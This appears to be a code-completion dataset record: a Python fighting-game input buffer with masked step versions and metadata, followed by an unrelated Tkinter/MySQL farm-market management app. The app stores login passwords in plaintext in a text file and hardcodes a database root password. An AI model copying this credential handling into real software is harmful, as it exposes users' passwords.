return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
def poll_client_inputs(self, frame: int) -> None:
if Input.is_action_pressed(action_name=self.left_action_name):
self.add_input(input=InputBuffer.Value.LEFT, frame=frame)
elif Input.is_action_pressed(action_name=self.right_action_name):
self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)
if Input.is_action_pressed(action_name=self.weak_punch_action_name):
self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)
self._inputs.pop(frame - self._frame_limit, None)
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(
self,
left_action_name: str,
right_action_name: str,
weak_punch_action_name: str,
frame_limit=12,
):
super().__init__(
left_action_name=left_action_name,
right_action_name=right_action_name,
weak_punch_action_name=weak_punch_action_name,
frame_limit=frame_limit,
)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) -> None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(
message=f"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}"
)
else:
Client.send_message_to_server(
message=f"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}"
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(
left_action_name="",
right_action_name="",
weak_punch_action_name="",
frame_limit=frame_limit,
)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) -> None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) -> None:
# TODO: Proper prediction
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
|
flexible
|
{
"blob_id": "4789546128263bd298f8f5827734f8402747b9ac",
"index": 67,
"step-1": "<mask token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n <mask token>\n <mask token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n",
"step-2": "<mask token>\n\n\nclass InputBuffer:\n <mask token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n <mask token>\n\n def __str__(self):\n return f'{self._inputs}'\n <mask token>\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n <mask token>\n <mask token>\n <mask token>\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n <mask token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n",
"step-3": "<mask token>\n\n\nclass InputBuffer:\n <mask token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n <mask token>\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n <mask token>\n <mask token>\n <mask token>\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n <mask token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n",
"step-4": "<mask token>\n\n\nclass InputBuffer:\n <mask token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n <mask token>\n <mask token>\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n <mask token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n",
"step-5": "from enum import Enum\n\nfrom roll.input import Input\nfrom roll.network import Server, Client\n\nfrom assets.game_projects.fighter.src.game_properties import GameProperties\nfrom assets.game_projects.fighter.src.network_message import NetworkMessage\n\n\nclass InputBuffer:\n \"\"\"\n Responsible for collecting game input from both players. The game state will pull data from here if needed.\n Network messages will also update the input buffer when receiving data from the opposite player\n \"\"\"\n\n class Value(Enum):\n LEFT = \"l\"\n RIGHT = \"r\"\n UP = \"u\"\n DOWN = \"d\"\n WEAK_PUNCH = \"wp\"\n\n def __init__(\n self,\n left_action_name: str,\n right_action_name: str,\n weak_punch_action_name: str,\n frame_limit=12,\n ):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f\"{self._inputs}\"\n\n def __repr__(self):\n return f\"{self._inputs}\"\n\n @property\n def values(self) -> list:\n return self._inputs.values()\n\n def add_input(self, input, frame: int) -> None:\n if frame in self._inputs:\n self._inputs[frame].append(input.value)\n else:\n self._inputs[frame] = [input.value]\n\n def get_inputs(self) -> dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) -> list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) -> bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) -> None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n def __init__(\n self,\n left_action_name: str,\n right_action_name: str,\n weak_punch_action_name: str,\n frame_limit=12,\n ):\n super().__init__(\n left_action_name=left_action_name,\n right_action_name=right_action_name,\n weak_punch_action_name=weak_punch_action_name,\n frame_limit=frame_limit,\n )\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) -> None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(\n message=f\"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}\"\n )\n else:\n Client.send_message_to_server(\n message=f\"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}\"\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n def __init__(self, frame_limit=12):\n super().__init__(\n left_action_name=\"\",\n right_action_name=\"\",\n weak_punch_action_name=\"\",\n frame_limit=frame_limit,\n )\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) -> None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) -> None:\n # TODO: Proper prediction\n if not self.game_properties.has_received_network_inputs:\n pass\n\n self._inputs.pop(frame - self._frame_limit, None)\n",
"step-ids": [
5,
12,
13,
15,
21
]
}
|
[
5,
12,
13,
15,
21
] |
<|reserved_special_token_0|>
def First_page(root):
global T1, T2, T3
frame = Frame(root, height=500, width=800, bg='ivory')
frame.pack()
label = Label(root, text='WELCOME TO AGRI MARKET', font=(
'Times new roman', 25))
label.place(x=200, y=50)
button = Button(root, text='LogIn', font=('times new roman', 20),
command=check_pass, bg='green')
button.place(x=350, y=350)
L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
L1.place(x=150, y=200)
T1 = tk.Entry(root, width=30, bd=5)
T1.place(x=280, y=200)
L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
L2.place(x=150, y=250)
T2 = tk.Entry(root, width=30, show='*', bd=5)
T2.place(x=280, y=250)
reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=
'blue', command=create_pass)
reg_button.place(x=340, y=400)
<|reserved_special_token_0|>
def create_pass():
global root, T1, T2, T3
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'ivory')
label.place(x=0, y=0)
L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
L1.place(x=150, y=200)
T1 = tk.Entry(root, width=30, bd=5)
T1.place(x=380, y=200)
L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
L2.place(x=150, y=250)
T2 = tk.Entry(root, width=30, show='*', bd=5)
T2.place(x=380, y=250)
L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),
bg='ivory')
L2.place(x=150, y=300)
T3 = tk.Entry(root, width=30, show='*', bd=5)
T3.place(x=380, y=300)
reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=
'blue', command=add_pass)
reg_button.place(x=440, y=400)
def add_pass():
global root, T1, T2, T3
if T2.get() != T3.get():
label = Label(root, text='Incorrect Password. Enter again', font=(
'times new roman', 20))
label.place(x=100, y=100)
else:
try:
with open('password.txt', 'r') as f:
data = f.read()
with open('password.txt', 'w') as f:
f.write(data + '\n')
f.write(T1.get() + '=' + T2.get())
entity_page()
except:
with open('password.txt', 'w') as f:
f.write(T1.get() + '=' + T2.get())
entity_page()
def entity_page():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'ivory')
label.place(x=0, y=0)
label = Label(root, text='WELCOME TO AGRI MARKET ', font=(
'Times new roman', 20), bg='blue')
label.place(x=200, y=20)
label = Label(root, text='Choose the Entity ', font=('Times new roman',
20), bg='white')
label.place(x=250, y=100)
Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer
)
Button.place(x=100, y=150 + 25)
Button = tk.Button(root, text='Company', font=('Arial', 15), command=
company)
Button.place(x=300, y=150 + 25)
Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command
=fertilizer)
Button.place(x=500, y=150 + 25)
Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)
Button.place(x=200, y=300 + 25)
Button = tk.Button(root, text='Payment', font=('Arial', 15), command=
payment)
Button.place(x=400, y=300 + 25)
Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),
command=history)
Button.place(x=200, y=400 + 25)
def history():
global root, cur, db
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])
data = cur.fetchall()
label = Label(root, text='The Transaction History of this month', font=
('Arial', 15))
label.place(x=200, y=20)
button = Button(root, text='BACK', command=entity_page)
button.place(x=20, y=20)
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('trans_id', text='Transaction Id')
table.heading('p_f_id', text='Farmer Id')
table.heading('p_date', text='Payment Date')
table.heading('p_amount', text='Amount')
table.heading('p_method', text='Payment Method')
table['show'] = 'headings'
table.pack()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
db.close()
db = mysql.connector.connect(host='localhost', user='root', passwd=
'bhushi', database='farmer_app')
cur = db.cursor()
<|reserved_special_token_0|>
def view_farmer():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',
'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('f_id', text='Farmer Id')
table.heading('f_name', text='Farmer Name')
table.heading('f_phone', text='Farmer Phone')
table.heading('f_mail', text='Farmer Mail')
table.heading('f_locality', text='Farmer Locality')
table.heading('f_address', text='Farmer Address')
table['show'] = 'headings'
table.column('f_id', width=100)
table.pack()
cur.execute('SELECT * FROM farmer;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_farmer():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=10)
label = Label(root, text='Farmer_name', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=60)
label = Label(root, text='Farmer_phone', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Farmer_mail', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=160)
label = Label(root, text='Farmer_locality', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=210)
label = Label(root, text='Farmer_address', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=270)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e6 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
e6.place(x=350, y=270)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_farmer_command)
Button.place(x=400, y=400)
<|reserved_special_token_0|>
def invalid(page):
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
if page == 'farmer':
label = Label(root, text='Enter valid farmer_id', font=(
'Times new roman', 30), bg='white')
label.place(x=170, y=200)
button = Button(root, text='Re-enter', font=('Times new roman', 20),
command=insert_farmer)
button.place(x=300, y=400)
elif page == 'company':
label = Label(root, text='Enter valid company_id', font=(
'Times new roman', 30), bg='white')
label.place(x=170, y=200)
button = Button(root, text='Re-enter', font=('Times new roman', 20),
command=insert_company)
button.place(x=300, y=400)
<|reserved_special_token_0|>
def delete_farmer_command():
try:
sql = 'DELETE FROM farmer WHERE f_id=%s;'
cur.execute(sql, [e1.get()])
db.commit()
farmer()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
def update_farmer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg
='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)
Button.place(x=300, y=400)
<|reserved_special_token_0|>
def update_command():
try:
sql = (
'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'
)
vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()
cur.executemany(sql, [vals])
db.commit()
farmer()
except:
update_farmer()
def search_farmer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg
='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)
Button.place(x=400, y=400)
def search():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM farmer WHERE f_id=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',
'farmer mail: ', 'farmer locality: ', 'farmer address: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))
l.place(x=100, y=300)
search_farmer()
def company():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_company)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_company)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_company)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_company)
Button.place(x=410, y=50)
view_company()
def view_company():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),
xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('c_id', text='Company Id')
table.heading('c_name', text='Company Name')
table.heading('c_address', text='Company Address')
table['show'] = 'headings'
table.column('c_id', width=100)
table.pack()
cur.execute('SELECT * FROM company;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
def insert_company():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company_id', font=('Times new roman', 20), bg
='white')
label.place(x=50, y=10)
label = Label(root, text='Company_name', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Company_address', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=110)
e3.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_company_command)
Button.place(x=400, y=400)
def insert_company_command():
try:
if len(e1.get()) > 3:
invalid('company')
else:
sql = 'INSERT INTO company values(%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get()
cur.executemany(sql, [vals])
db.commit()
company()
except:
insert_company()
def delete_company():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Id:', font=('Times new roman', 20),
bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_company_command)
Button.place(x=400, y=400)
def delete_company_command():
try:
sql = 'DELETE FROM company WHERE c_id=%s;'
cur.execute(sql, [int(e1.get())])
db.commit()
company()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
<|reserved_special_token_0|>
def update_c():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM company WHERE c_id=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Company_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Company_name', font=('Times new roman',
20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Company_address', font=('Times new roman',
20), bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=110)
e3.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_c)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_company()
<|reserved_special_token_0|>
def search_company():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Id:', font=('Times new roman', 20),
bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_c)
Button.place(x=400, y=400)
def search_c():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM company WHERE c_id=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=company
)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['company id: ', 'company name: ', 'company address: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Company Id', font=('times new roman', 15)
)
l.place(x=100, y=300)
search_company()
<|reserved_special_token_0|>
def view_fer():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',
'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.
set, yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('fe_formula', text='Fertilizer Formula')
table.heading('fe_name', text='Fertilizer name')
table.heading('fe_content', text='Fertilizer content')
table.heading('fe_price', text='Fertilizer price')
table.heading('company_id', text='Company_id')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM fertilizer;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_fer_command():
try:
sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
fertilizer()
except:
insert_fer()
def delete_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertilizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
fertilizer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_fer_command)
Button.place(x=400, y=400)
def delete_fer_command():
try:
sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'
cur.execute(sql, [e1.get()])
db.commit()
fertilizer()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
def update_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertlizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)
Button.place(x=300, y=400)
def update_fe():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Fertlizer formula', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=10)
label = Label(root, text='Fertlizer name', font=('Times new roman',
20), bg='white')
label.place(x=50, y=60)
label = Label(root, text='Fertlizer content', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Fertlizer price', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='comapny_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
e4 = Entry(root)
e5 = Entry(root)
data = cur.fetchall()
